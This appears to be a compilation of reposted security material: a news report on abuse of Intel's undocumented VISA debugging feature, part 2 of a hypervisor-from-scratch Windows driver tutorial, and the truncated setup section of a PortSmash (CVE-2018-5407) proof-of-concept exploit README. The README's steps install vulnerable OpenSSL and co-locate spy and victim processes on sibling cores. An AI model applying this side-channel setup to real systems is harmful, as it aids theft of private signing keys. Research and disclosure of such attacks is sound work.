Researchers discover and abuse new undocumented feature in Intel chipsets

Original text by Catalin Cimpanu

Researchers find new Intel VISA (Visualization of Internal Signals Architecture) debugging technology.

At the Black Hat Asia 2019 security conference, security researchers from Positive Technologies disclosed the existence of a previously unknown and undocumented feature in Intel chipsets.

Called Intel Visualization of Internal Signals Architecture (Intel VISA), Positive Technologies researchers Maxim Goryachy and Mark Ermolov said this is a new utility included in modern Intel chipsets to help with testing and debugging on manufacturing lines.

VISA is included in the Platform Controller Hub (PCH) chipsets that ship with modern Intel CPUs and works like a full-fledged logic signal analyzer.

PCH
Image: Wikimedia Commons

According to the two researchers, VISA intercepts electronic signals sent from internal buses and peripherals (display, keyboard, and webcam) to the PCH, and later to the main CPU.

VISA EXPOSES A COMPUTER’S ENTIRE DATA

Unauthorized access to the VISA feature would allow a threat actor to intercept data from the computer memory and create spyware that works at the lowest possible level.

But despite its extremely intrusive nature, very little is known about this new technology. Goryachy and Ermolov said VISA’s documentation is subject to a non-disclosure agreement, and not available to the general public.

Normally, this combination of secrecy and a secure default should keep Intel users safe from possible attacks and abuse.

However, the two researchers said they found several methods of enabling VISA and abusing it to sniff data that passes through the CPU, and even through the secretive Intel Management Engine (ME), which has been housed in the PCH since the release of the Nehalem processors and 5-Series chipsets.

INTEL SAYS IT’S SAFE. RESEARCHERS DISAGREE.

Goryachy and Ermolov said their technique requires neither hardware modifications to a computer’s motherboard nor any specific equipment to carry out.

The simplest method consists of using the vulnerabilities detailed in Intel’s Intel-SA-00086 security advisory to take control of the Intel Management Engine and enable VISA that way.

"The Intel VISA issue, as discussed at BlackHat Asia, relies on physical access and a previously mitigated vulnerability addressed in INTEL-SA-00086 on November 20, 2017," an Intel spokesperson told ZDNet yesterday.

"Customers who have applied those mitigations are protected from known vectors," the company said.

However, in an online discussion after his Black Hat talk, Ermolov said the Intel-SA-00086 fixes are not enough, as Intel firmware can be downgraded to vulnerable versions where the attackers can take over Intel ME and later enable VISA.

Furthermore, Ermolov said that there are three other ways to enable Intel VISA, methods that will become public when Black Hat organizers publish the duo’s presentation slides in the coming days.

As Ermolov said yesterday, VISA is not a vulnerability in Intel chipsets, but just another way in which a useful feature could be abused and turned against users. The chances that VISA will be abused are low: if someone goes to the trouble of exploiting the Intel-SA-00086 vulnerabilities to take over Intel ME, they will likely use that component to carry out their attacks rather than rely on VISA.

As a side note, this is the second "manufacturing mode" feature Goryachy and Ermolov have found in the past year. They also found that Apple accidentally shipped some laptops with Intel CPUs that were left in "manufacturing mode."


Hypervisor From Scratch – Part 2: Entering VMX Operation

Original text by Sinaei

Hi guys,

This is the second part of a multi-part tutorial series called "Hypervisor From Scratch". I highly recommend reading the first part (Basic Concepts & Configure Testing Environment) before this one, as it contains the basic knowledge you need in order to understand the rest of this tutorial.

In this part, we will learn how to detect hypervisor support on our processor, then configure the basics needed to enable VMX and enter VMX operation, and cover a lot more about the Windows Driver Kit (WDK).

Configuring Our IRP Major Functions

Besides our kernel-mode driver ("MyHypervisorDriver"), I created a user-mode application called "MyHypervisorApp" (the source code for both is available on my GitHub). First of all, I should encourage you to write most of your code in user mode rather than kernel mode: unhandled exceptions in kernel mode lead to BSODs, and running less code in kernel mode reduces the chance of introducing nasty kernel-mode bugs.

If you remember from the previous part, we wrote some Windows Driver Kit code; now we want to extend the project to support more IRP Major Functions.

IRP Major Functions are listed in a conventional Windows table that is created for every device. Once you register your device in Windows, you have to supply the functions that handle these IRP Major Functions. In other words, every device has a table of its Major Functions, and every time a user-mode application calls one of them, Windows finds the corresponding handler (if the device driver supports that MJ Function) based on the device requested by the user, calls it, and passes an IRP pointer to the kernel driver.

It is then the responsibility of the device's handler to check privileges and so on.

The following code creates the device:

NTSTATUS NtStatus = STATUS_SUCCESS;
UINT64 uiIndex = 0;
PDEVICE_OBJECT pDeviceObject = NULL;
UNICODE_STRING usDriverName, usDosDeviceName;

DbgPrint("[*] DriverEntry Called.");

RtlInitUnicodeString(&usDriverName, L"\\Device\\MyHypervisorDevice");
RtlInitUnicodeString(&usDosDeviceName, L"\\DosDevices\\MyHypervisorDevice");

NtStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject);
NTSTATUS NtStatusSymLinkResult = IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);

Note that our device name is "\Device\MyHypervisorDevice".

After that, we need to introduce our Major Functions for our device.

if (NtStatus == STATUS_SUCCESS && NtStatusSymLinkResult == STATUS_SUCCESS)
{
    for (uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++)
        pDriverObject->MajorFunction[uiIndex] = DrvUnsupported;

    DbgPrint("[*] Setting Devices major functions.");
    pDriverObject->MajorFunction[IRP_MJ_CLOSE] = DrvClose;
    pDriverObject->MajorFunction[IRP_MJ_CREATE] = DrvCreate;
    pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DrvIOCTLDispatcher;
    pDriverObject->MajorFunction[IRP_MJ_READ] = DrvRead;
    pDriverObject->MajorFunction[IRP_MJ_WRITE] = DrvWrite;

    pDriverObject->DriverUnload = DrvUnload;
}
else
{
    DbgPrint("[*] There was some errors in creating device.");
}

You can see that I assigned "DrvUnsupported" to all of the functions; this is a handler for all MJ Functions that tells the user the operation is not supported. The main body of this function looks like this:

NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    DbgPrint("[*] This function is not supported 🙁 !");

    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);

    return STATUS_SUCCESS;
}

We also introduce the other major functions that are essential for our device. We'll complete their implementation in future parts; for now, let's just leave them as stubs.

NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    DbgPrint("[*] Not implemented yet 🙁 !");

    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);

    return STATUS_SUCCESS;
}

NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    DbgPrint("[*] Not implemented yet 🙁 !");

    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);

    return STATUS_SUCCESS;
}

NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    DbgPrint("[*] Not implemented yet 🙁 !");

    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);

    return STATUS_SUCCESS;
}

NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    DbgPrint("[*] Not implemented yet 🙁 !");

    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);

    return STATUS_SUCCESS;
}

Now let's look at the list of IRP MJ Functions and other types of Windows Driver Kit handler routines.

IRP Major Functions List

This is a list of IRP Major Functions which we can use in order to perform different operations.

#define IRP_MJ_CREATE                   0x00
#define IRP_MJ_CREATE_NAMED_PIPE        0x01
#define IRP_MJ_CLOSE                    0x02
#define IRP_MJ_READ                     0x03
#define IRP_MJ_WRITE                    0x04
#define IRP_MJ_QUERY_INFORMATION        0x05
#define IRP_MJ_SET_INFORMATION          0x06
#define IRP_MJ_QUERY_EA                 0x07
#define IRP_MJ_SET_EA                   0x08
#define IRP_MJ_FLUSH_BUFFERS            0x09
#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
#define IRP_MJ_SET_VOLUME_INFORMATION   0x0b
#define IRP_MJ_DIRECTORY_CONTROL        0x0c
#define IRP_MJ_FILE_SYSTEM_CONTROL      0x0d
#define IRP_MJ_DEVICE_CONTROL           0x0e
#define IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f
#define IRP_MJ_SHUTDOWN                 0x10
#define IRP_MJ_LOCK_CONTROL             0x11
#define IRP_MJ_CLEANUP                  0x12
#define IRP_MJ_CREATE_MAILSLOT          0x13
#define IRP_MJ_QUERY_SECURITY           0x14
#define IRP_MJ_SET_SECURITY             0x15
#define IRP_MJ_POWER                    0x16
#define IRP_MJ_SYSTEM_CONTROL           0x17
#define IRP_MJ_DEVICE_CHANGE            0x18
#define IRP_MJ_QUERY_QUOTA              0x19
#define IRP_MJ_SET_QUOTA                0x1a
#define IRP_MJ_PNP                      0x1b
#define IRP_MJ_PNP_POWER                IRP_MJ_PNP      // Obsolete....
#define IRP_MJ_MAXIMUM_FUNCTION         0x1b

Each major function triggers only when we call its corresponding function from user mode. For instance, there is a user-mode function called CreateFile (and its variants CreateFileA and CreateFileW for ANSI and Unicode), so every time we call CreateFile, the routine registered for IRP_MJ_CREATE is called; likewise, ReadFile triggers IRP_MJ_READ and WriteFile triggers IRP_MJ_WRITE. You can see that Windows treats its devices like files, and everything we need to pass from user mode to kernel mode is available in the PIRP Irp as a buffer when the handler is called.

In this case, Windows is responsible for copying the user-mode buffer to the kernel-mode stack.

Don't worry, we'll use these frequently in the rest of the project, but in this part we only support IRP_MJ_CREATE and leave the others unimplemented for future parts.
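
For example, since the driver registers DrvIOCTLDispatcher for IRP_MJ_DEVICE_CONTROL and its header defines an IOCTL_TEST code, a user-mode call along the following lines would end up in that dispatcher. This is only an illustrative sketch; the buffers and their layout are my own and not part of the tutorial's code:

#include <windows.h>
#include <stdio.h>

#define IOCTL_TEST 0x1   // same test code as defined in the driver's header

int main(void)
{
    // Opening the device triggers IRP_MJ_CREATE (DrvCreate in the driver).
    HANDLE hDevice = CreateFileW(L"\\\\.\\MyHypervisorDevice",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[!] Could not open device (error %lu)\n", GetLastError());
        return 1;
    }

    char  inBuffer[]    = "test";
    char  outBuffer[64] = { 0 };
    DWORD bytesReturned = 0;

    // This call is dispatched to the routine registered for IRP_MJ_DEVICE_CONTROL.
    DeviceIoControl(hDevice, IOCTL_TEST,
        inBuffer, sizeof(inBuffer),
        outBuffer, sizeof(outBuffer),
        &bytesReturned, NULL);

    // Closing the handle eventually triggers IRP_MJ_CLOSE (DrvClose).
    CloseHandle(hDevice);
    return 0;
}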

IRP Minor Functions

IRP Minor Functions are mainly used by the PnP manager to notify drivers of special events. For example, the PnP manager sends IRP_MN_START_DEVICE after it has assigned hardware resources, if any, to the device, and it sends IRP_MN_STOP_DEVICE to stop a device so it can reconfigure the device's hardware resources.

We will need these minor functions later in this series.

A list of IRP Minor Functions is available below:

IRP_MN_START_DEVICE
IRP_MN_QUERY_STOP_DEVICE
IRP_MN_STOP_DEVICE
IRP_MN_CANCEL_STOP_DEVICE
IRP_MN_QUERY_REMOVE_DEVICE
IRP_MN_REMOVE_DEVICE
IRP_MN_CANCEL_REMOVE_DEVICE
IRP_MN_SURPRISE_REMOVAL
IRP_MN_QUERY_CAPABILITIES
IRP_MN_QUERY_PNP_DEVICE_STATE
IRP_MN_FILTER_RESOURCE_REQUIREMENTS
IRP_MN_DEVICE_USAGE_NOTIFICATION
IRP_MN_QUERY_DEVICE_RELATIONS
IRP_MN_QUERY_RESOURCES
IRP_MN_QUERY_RESOURCE_REQUIREMENTS
IRP_MN_QUERY_ID
IRP_MN_QUERY_DEVICE_TEXT
IRP_MN_QUERY_BUS_INFORMATION
IRP_MN_QUERY_INTERFACE
IRP_MN_READ_CONFIG
IRP_MN_WRITE_CONFIG
IRP_MN_DEVICE_ENUMERATED
IRP_MN_SET_LOCK

Fast I/O

To optimize your VMM, you can use Fast I/O, which is a different way to initiate I/O operations that is faster than IRPs. Fast I/O operations are always synchronous.

According to MSDN:

Fast I/O is specifically designed for rapid synchronous I/O on cached files. In fast I/O operations, data is transferred directly between user buffers and the system cache, bypassing the file system and the storage driver stack. (Storage drivers do not use fast I/O.) If all of the data to be read from a file is resident in the system cache when a fast I/O read or write request is received, the request is satisfied immediately. 

When the I/O Manager receives a request for synchronous file I/O (other than paging I/O), it invokes the fast I/O routine first. If the fast I/O routine returns TRUE, the operation was serviced by the fast I/O routine. If the fast I/O routine returns FALSE, the I/O Manager creates and sends an IRP instead.

The definition of the Fast I/O dispatch table is:

typedef struct _FAST_IO_DISPATCH {
  ULONG                                  SizeOfFastIoDispatch;
  PFAST_IO_CHECK_IF_POSSIBLE             FastIoCheckIfPossible;
  PFAST_IO_READ                          FastIoRead;
  PFAST_IO_WRITE                         FastIoWrite;
  PFAST_IO_QUERY_BASIC_INFO              FastIoQueryBasicInfo;
  PFAST_IO_QUERY_STANDARD_INFO           FastIoQueryStandardInfo;
  PFAST_IO_LOCK                          FastIoLock;
  PFAST_IO_UNLOCK_SINGLE                 FastIoUnlockSingle;
  PFAST_IO_UNLOCK_ALL                    FastIoUnlockAll;
  PFAST_IO_UNLOCK_ALL_BY_KEY             FastIoUnlockAllByKey;
  PFAST_IO_DEVICE_CONTROL                FastIoDeviceControl;
  PFAST_IO_ACQUIRE_FILE                  AcquireFileForNtCreateSection;
  PFAST_IO_RELEASE_FILE                  ReleaseFileForNtCreateSection;
  PFAST_IO_DETACH_DEVICE                 FastIoDetachDevice;
  PFAST_IO_QUERY_NETWORK_OPEN_INFO       FastIoQueryNetworkOpenInfo;
  PFAST_IO_ACQUIRE_FOR_MOD_WRITE         AcquireForModWrite;
  PFAST_IO_MDL_READ                      MdlRead;
  PFAST_IO_MDL_READ_COMPLETE             MdlReadComplete;
  PFAST_IO_PREPARE_MDL_WRITE             PrepareMdlWrite;
  PFAST_IO_MDL_WRITE_COMPLETE            MdlWriteComplete;
  PFAST_IO_READ_COMPRESSED               FastIoReadCompressed;
  PFAST_IO_WRITE_COMPRESSED              FastIoWriteCompressed;
  PFAST_IO_MDL_READ_COMPLETE_COMPRESSED  MdlReadCompleteCompressed;
  PFAST_IO_MDL_WRITE_COMPLETE_COMPRESSED MdlWriteCompleteCompressed;
  PFAST_IO_QUERY_OPEN                    FastIoQueryOpen;
  PFAST_IO_RELEASE_FOR_MOD_WRITE         ReleaseForModWrite;
  PFAST_IO_ACQUIRE_FOR_CCFLUSH           AcquireForCcFlush;
  PFAST_IO_RELEASE_FOR_CCFLUSH           ReleaseForCcFlush;
} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;
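
As a quick illustration of how a driver would opt in to Fast I/O (our hypervisor driver does not actually need this; the callback name below is made up), the table is filled in and attached to the driver object in DriverEntry:

// Hypothetical Fast I/O read callback. Returning FALSE tells the I/O manager
// to fall back to building a normal IRP for this request.
BOOLEAN MyFastIoRead(PFILE_OBJECT FileObject, PLARGE_INTEGER FileOffset,
    ULONG Length, BOOLEAN Wait, ULONG LockKey, PVOID Buffer,
    PIO_STATUS_BLOCK IoStatus, PDEVICE_OBJECT DeviceObject)
{
    UNREFERENCED_PARAMETER(FileObject);  UNREFERENCED_PARAMETER(FileOffset);
    UNREFERENCED_PARAMETER(Length);      UNREFERENCED_PARAMETER(Wait);
    UNREFERENCED_PARAMETER(LockKey);     UNREFERENCED_PARAMETER(Buffer);
    UNREFERENCED_PARAMETER(IoStatus);    UNREFERENCED_PARAMETER(DeviceObject);
    return FALSE;
}

// The dispatch table must stay valid for the driver's whole lifetime,
// so it lives in a global rather than on the stack.
FAST_IO_DISPATCH g_FastIoDispatch = { 0 };

// Inside DriverEntry, after creating the device object:
//     g_FastIoDispatch.SizeOfFastIoDispatch = sizeof(FAST_IO_DISPATCH);
//     g_FastIoDispatch.FastIoRead           = MyFastIoRead;
//     pDriverObject->FastIoDispatch         = &g_FastIoDispatch;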

Defined Headers

I created the following header (Source.h) for my driver.

#pragma once
#include <ntddk.h>
#include <wdf.h>
#include <wdm.h>

extern void inline Breakpoint(void);
extern void inline Enable_VMX_Operation(void);

NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject, PUNICODE_STRING  pRegistryPath);
VOID DrvUnload(PDRIVER_OBJECT  DriverObject);
NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
NTSTATUS DrvIOCTLDispatcher(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);

VOID PrintChars(_In_reads_(CountChars) PCHAR BufferAddress, _In_ size_t CountChars);
VOID PrintIrpInfo(PIRP Irp);

#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, DrvUnload)
#pragma alloc_text(PAGE, DrvCreate)
#pragma alloc_text(PAGE, DrvRead)
#pragma alloc_text(PAGE, DrvWrite)
#pragma alloc_text(PAGE, DrvClose)
#pragma alloc_text(PAGE, DrvUnsupported)
#pragma alloc_text(PAGE, DrvIOCTLDispatcher)

// IOCTL Codes and Its meanings
#define IOCTL_TEST 0x1 // In case of testing

Now just compile your driver.

Loading the Driver and Checking the Presence of the Device

In order to load our driver (MyHypervisorDriver), first download OSR Driver Loader, then run Sysinternals DbgView as administrator and make sure that it captures kernel output (you can check this via Capture -> Capture Kernel).

Enable Capturing Event

After that, open the OSR Driver Loader (go to OsrLoader -> kit -> WNET -> AMD64 -> FRE) and run OSRLOADER.exe (in an x64 environment). Now, if you have built your driver, find the .sys file (in MyHypervisorDriver\x64\Debug\ there should be a file named "MyHypervisorDriver.sys"). In OSR Driver Loader, click Browse, select MyHypervisorDriver.sys, and click "Register Service"; after the message box confirms that your driver was registered successfully, click "Start Service".

Please note that you should have the WDK installed for your Visual Studio in order to be able to build your project.

Load Driver in OSR Driver Loader

Now switch back to DbgView; you should see that your driver loaded successfully and that a message "[*] DriverEntry Called." appears.

If there is no problem, then you're good to go; otherwise, if you have a problem with DbgView, check the next step.

Keep in mind that, now that you have registered your driver, you can use Sysinternals WinObj to see whether "MyHypervisorDevice" is available or not.

WinObj

The Problem with DbgView

Unfortunately, for some unknown reason, I was not able to view the results of DbgPrint(). If you can see the results, you can skip this step, but if you have a problem, perform the following steps:

As I mentioned in part 1:

In regedit, add a key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter

Under that key, add a DWORD value named IHVDRIVER with a value of 0xFFFF.

Reboot the machine and you'll be good to go.

This has always worked for me and I have tested it on many computers, but my MacBook seems to have a problem.

In order to solve this problem, you need to find a Windows kernel global variable called nt!Kd_DEFAULT_Mask. This variable controls which messages are shown in DbgView; it is a bit mask whose exact layout I'm not aware of, so I just put 0xffffffff in it to simply make it show everything!

To do this, you need to set up Windows local kernel debugging using WinDbg.

  1. Open a Command Prompt window as Administrator. Enter bcdedit /debug on
  2. If the computer is not already configured as the target of a debug transport, enter bcdedit /dbgsettings local
  3. Reboot the computer.

After that, open WinDbg with administrator privileges, go to File > Kernel Debug > Local > press OK, and in your local WinDbg session find nt!Kd_DEFAULT_Mask using the following command:

lkd> x nt!kd_Default_Mask
fffff801`f5211808 nt!Kd_DEFAULT_Mask = <no type information>

Now change its value to 0xffffffff.

lkd> eb fffff801`f5211808 ff ff ff ff
kd_DEFAULT_Mask

After that, you should see the results, and you'll be good to go.

Remember, this is an essential step for the rest of the topic, because if we can't see any kernel details, we can't debug.

DbgView

Detecting Hypervisor Support

Discovering support for VMX is the first thing you should do before enabling VT-x; this is covered in the Intel Software Developer's Manual, Volume 3C, Section 23.6, DISCOVERING SUPPORT FOR VMX.

You can detect the presence of VMX using CPUID: if CPUID.1:ECX.VMX[bit 5] = 1, then VMX operation is supported.

First of all, we need to know whether we're running on an Intel-based processor or not; this can be determined by executing the CPUID instruction and checking for the vendor string "GenuineIntel".

The following function returns the vendor string from the CPUID instruction.

string GetCpuID()
{
    //Initialize used variables
    char SysType[13]; //Array consisting of 13 single bytes/characters
    string CpuID; //The string that will be used to add all the characters to

    //Starting coding in assembly language
    _asm
    {
        //Execute CPUID with EAX = 0 to get the CPU producer
        XOR EAX, EAX
        CPUID
        //MOV EBX to EAX and get the characters one by one by using shift out right bitwise operation.
        MOV EAX, EBX
        MOV SysType[0], al
        MOV SysType[1], ah
        SHR EAX, 16
        MOV SysType[2], al
        MOV SysType[3], ah
        //Get the second part the same way but these values are stored in EDX
        MOV EAX, EDX
        MOV SysType[4], al
        MOV SysType[5], ah
        SHR EAX, 16
        MOV SysType[6], al
        MOV SysType[7], ah
        //Get the third part
        MOV EAX, ECX
        MOV SysType[8], al
        MOV SysType[9], ah
        SHR EAX, 16
        MOV SysType[10], al
        MOV SysType[11], ah
        MOV SysType[12], 00
    }
    CpuID.assign(SysType, 12);
    return CpuID;
}

The last step is checking for the presence of VMX; you can check it using the following code:

bool VMX_Support_Detection()
{
    bool VMX = false;
    __asm
    {
        xor    eax, eax
        inc    eax
        cpuid
        bt     ecx, 0x5
        jc     VMXSupport
        VMXNotSupport :
        jmp     NopInstr
        VMXSupport :
        mov    VMX, 0x1
        NopInstr :
        nop
    }

    return VMX;
}

As you can see, it executes CPUID with EAX=1, and if bit 5 (the 6th bit) of ECX is 1, then VMX operation is supported. We can also perform the same check in the kernel driver.
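
Because inline assembly is not available for x64 targets in MSVC, doing the same check inside the kernel driver would typically use the compiler's CPUID intrinsic instead. Here is a minimal sketch meant to sit in the driver source (the helper name is mine):

#include <intrin.h>

BOOLEAN IsVmxSupported()
{
    int cpuInfo[4] = { 0 };

    // CPUID leaf 1: feature information. ECX comes back in cpuInfo[2].
    __cpuid(cpuInfo, 1);

    // CPUID.1:ECX.VMX[bit 5] = 1 means VMX operation is supported.
    return (cpuInfo[2] & (1 << 5)) != 0;
}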

All in all, our main code should be something like this:

int main()
{
    string CpuID;
    CpuID = GetCpuID();
    cout << "[*] The CPU Vendor is : " << CpuID << endl;
    if (CpuID == "GenuineIntel")
    {
        cout << "[*] The Processor virtualization technology is VT-x. \n";
    }
    else
    {
        cout << "[*] This program is not designed to run in a non-VT-x environment !\n";
        return 1;
    }
    if (VMX_Support_Detection())
    {
        cout << "[*] VMX Operation is supported by your processor .\n";
    }
    else
    {
        cout << "[*] VMX Operation is not supported by your processor .\n";
        return 1;
    }
    _getch();
    return 0;
}

The final result:

User-mode app

Enabling VMX Operation

If our processor supports VMX operation, then it's time to enable it. As I mentioned above, IRP_MJ_CREATE is the first function that should be used to start the operation.

From the Intel Software Developer's Manual (23.7 ENABLING AND ENTERING VMX OPERATION):

Before system software can enter VMX operation, it enables VMX by setting CR4.VMXE[bit 13] = 1. VMX operation is then entered by executing the VMXON instruction. VMXON causes an invalid-opcode exception (#UD) if executed with CR4.VMXE = 0. Once in VMX operation, it is not possible to clear CR4.VMXE. System software leaves VMX operation by executing the VMXOFF instruction. CR4.VMXE can be cleared outside of VMX operation after executing of VMXOFF.
VMXON is also controlled by the IA32_FEATURE_CONTROL MSR (MSR address 3AH). This MSR is cleared to zero when a logical processor is reset. The relevant bits of the MSR are:

  •  Bit 0 is the lock bit. If this bit is clear, VMXON causes a general-protection exception. If the lock bit is set, WRMSR to this MSR causes a general-protection exception; the MSR cannot be modified until a power-up reset condition. System BIOS can use this bit to provide a setup option for BIOS to disable support for VMX. To enable VMX support in a platform, BIOS must set bit 1, bit 2, or both, as well as the lock bit.
  •  Bit 1 enables VMXON in SMX operation. If this bit is clear, execution of VMXON in SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support both VMX operation and SMX operation cause general-protection exceptions.
  •  Bit 2 enables VMXON outside SMX operation. If this bit is clear, execution of VMXON outside SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support VMX operation cause general-protection exceptions.
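
To make this concrete, a kernel-mode sketch of checking those bits before attempting VMXON might look like the following. This helper is my own illustration, not part of the tutorial's code, and it uses the __readmsr intrinsic:

#define IA32_FEATURE_CONTROL_MSR 0x3A

BOOLEAN IsVmxonAllowedOutsideSmx()
{
    ULONGLONG featureControl = __readmsr(IA32_FEATURE_CONTROL_MSR);

    BOOLEAN lockBit            = (featureControl >> 0) & 1;  // bit 0: lock bit
    BOOLEAN vmxonOutsideSmxBit = (featureControl >> 2) & 1;  // bit 2: enable VMXON outside SMX

    // If the lock bit is clear, VMXON would raise #GP; if it is set but bit 2
    // is clear, the BIOS has disabled VMX outside SMX operation.
    return lockBit && vmxonOutsideSmxBit;
}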

Setting CR4 VMXE Bit

Do you remember the previous part, where I told you how to create inline assembly in a Windows Driver Kit x64 project?

Now you should create a function to perform this operation in assembly.

In your header file (in my case Source.h), declare your function:

extern void inline Enable_VMX_Operation(void);

Then, in your assembly file (in my case SourceAsm.asm), add this function (which sets bit 13, the 14th bit, of CR4).

Enable_VMX_Operation PROC PUBLIC
push rax                ; Save the state

xor rax,rax             ; Clear the RAX
mov rax,cr4
or rax,02000h           ; Set the 14th bit
mov cr4,rax

pop rax                 ; Restore the state
ret
Enable_VMX_Operation ENDP

Also, declare your function at the top of SourceAsm.asm:

PUBLIC Enable_VMX_Operation

The above function should be called in DrvCreate:

NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    Enable_VMX_Operation();    // Enabling VMX Operation
    DbgPrint("[*] VMX Operation Enabled Successfully !");
    return STATUS_SUCCESS;
}

Finally, you should call the following function from user mode:

HANDLE hWnd = CreateFile(L"\\\\.\\MyHypervisorDevice",
    GENERIC_READ | GENERIC_WRITE,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    NULL, /// lpSecurityAttributes
    OPEN_EXISTING,
    FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
    NULL); /// lpTemplateFile

If you see the following result, then you completed the second part successfully.

Final Show

Important note: your .asm file should have a different name from your driver's main file (.c file). For example, if your driver file is "Source.c", then using the name "Source.asm" causes weird linking errors in Visual Studio; change the name of your .asm file to something like "SourceAsm.asm" to avoid these kinds of linker errors.

Conclusion

In this part, you learned the basics you need to know in order to create a Windows Driver Kit program, and we then enabled VMX operation on the processor, laying a cornerstone for the rest of the series.

In the third part, we'll go deeper into Intel VT-x and make our driver even more advanced, so stay tuned; it'll be ready soon!

The source code for this part is available at:

[https://github.com/SinaKarvandi/Hypervisor-From-Scratch/]

References

[1] Intel® 64 and IA-32 Architectures Software Developer's Manual, Combined Volumes 3 (https://software.intel.com/en-us/articles/intel-sdm)

[2] IRP_MJ_DEVICE_CONTROL (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/irp-mj-device-control)

[3]  Windows Driver Kit Samples (https://github.com/Microsoft/Windows-driver-samples/blob/master/general/ioctl/wdm/sys/sioctl.c)

[4] Setting Up Local Kernel Debugging of a Single Computer Manually (https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-local-kernel-debugging-of-a-single-computer-manually)

[5] Obtain processor manufacturer using CPUID (https://www.daniweb.com/programming/software-development/threads/112968/obtain-processor-manufacturer-using-cpuid)

[6] Plug and Play Minor IRPs (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/plug-and-play-minor-irps)

[7] _FAST_IO_DISPATCH structure (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/ns-wdm-_fast_io_dispatch)

[8] Filtering IRPs and Fast I/O (https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filtering-irps-and-fast-i-o)

[9] Windows File System Filter Driver Development (https://www.apriorit.com/dev-blog/167-file-system-filter-driver)

CVE-2018-5407 (flaw in Intel processor execution engine sharing on SMT (e.g. Hyper-Threading) architectures) PoC

Summary

This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by CVE-2018-5407.


Setup

Prerequisites

A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement.

This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in spy is likely needed.

OpenSSL

Download and install OpenSSL 1.1.0h or lower:

cd /usr/local/src
wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz
tar xzf openssl-1.1.0h.tar.gz
cd openssl-1.1.0h/
export OPENSSL_ROOT_DIR=/usr/local/ssl
./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib
make -j8
make test
sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw

If you use a different path, you’ll need to make changes to Makefile and sync.sh.

Tooling

freq.sh

Turns off frequency scaling and TurboBoost.

sync.sh

Syncs the trace through pipes. It has two victims, only one of which should be active at a time:

  1. The stock openssl running dgst command to produce a P-384 signature.
  2. A harness ecc that calls scalar multiplication directly with a known key. (Useful for profiling.)

The script will generate a P-384 key pair in secp384r1.pem if it does not already exist.

The script outputs data.bin, which is what openssl dgst signed, and you should be able to verify the ECDSA signature data.sig afterwards with:

openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin

In the ecc tool case, data.bin and secp384r1.pem are meaningless and data.sig is not created.

For the taskset commands in sync.sh, the cores need to be two logical cores of the same physical core; sanity check with

$ grep '^core id' /proc/cpuinfo
core id		: 0
core id		: 1
core id		: 2
core id		: 3
core id		: 0
core id		: 1
core id		: 2
core id		: 3

So the script is currently configured for logical cores 3 and 7, which both map to physical core 3 (core id).

spy

